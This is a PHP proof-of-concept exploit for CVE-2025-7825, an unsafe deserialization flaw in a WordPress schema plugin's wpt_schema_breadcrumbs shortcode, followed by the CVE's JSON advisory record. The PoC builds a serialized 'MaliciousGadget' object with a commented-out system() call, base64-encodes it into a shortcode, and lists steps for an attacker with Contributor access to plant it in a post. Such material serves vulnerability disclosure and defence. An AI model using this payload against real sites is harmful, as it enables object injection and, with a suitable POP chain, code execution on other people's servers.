CVE-2025-7825

<?php /** * CVE-2025-7825 PoC - Unsafe Deserialization via wpt_schema_breadcrumbs shortcode * * This PoC demonstrates how an authenticated attacker with Contributor-level * access can inject a malicious serialized PHP object through the * wpt_schema_breadcrumbs shortcode in the Schema Plugin For Divi, Gutenberg * & Shortcodes (versions <= 4.3.2). * * The exploit requires a POP chain present in another plugin/theme installed * on the target WordPress site to achieve code execution. */ // Step 1: Create a malicious serialized payload // Example: A generic POP gadget payload (requires a compatible POP chain on target) class MaliciousGadget { public $command; public function __destruct() { // If a POP chain with code execution gadget exists on the target, // this could be triggered during deserialization if (isset($this->command)) { // Placeholder for exploitation logic // system($this->command); } } } // Generate serialized payload $payload = serialize(new MaliciousGadget()); // Step 2: Craft the malicious shortcode to be injected into a post // The shortcode will be processed by the vulnerable plugin $malicious_shortcode = '[wpt_schema_breadcrumbs data="' . base64_encode($payload) . '"]'; // Step 3: Attacker with Contributor+ access submits a post containing the shortcode echo $malicious_shortcode; /** * Usage: * 1. Register or compromise an account with Contributor-level access * 2. Create a new post/page containing the crafted shortcode * 3. Submit for review or publish the post * 4. When the post is rendered, the plugin deserializes the payload * 5. If a POP chain exists in another plugin/theme, code execution is achieved * * Note: This vulnerability alone has no direct impact without a POP chain * present in another installed plugin or theme on the target system. */ ?>

{"cve": {"id": "CVE-2025-7825", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:44.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Schema Plugin For Divi, Gutenberg & Shortcodes plugin for WordPress is vulnerable to Object Instantiation in all versions up to, and including, 4.3.2 via deserialization of untrusted input via the wpt_schema_breadcrumbs shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-96"}]}], "references": [{"url": "https://wordpress.org/plugins/wp-structured-data-schema/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb81a3e-744f-4a16-ad9b-1b9dbc09571c?source=cve", "source": "[email protected]"}]}}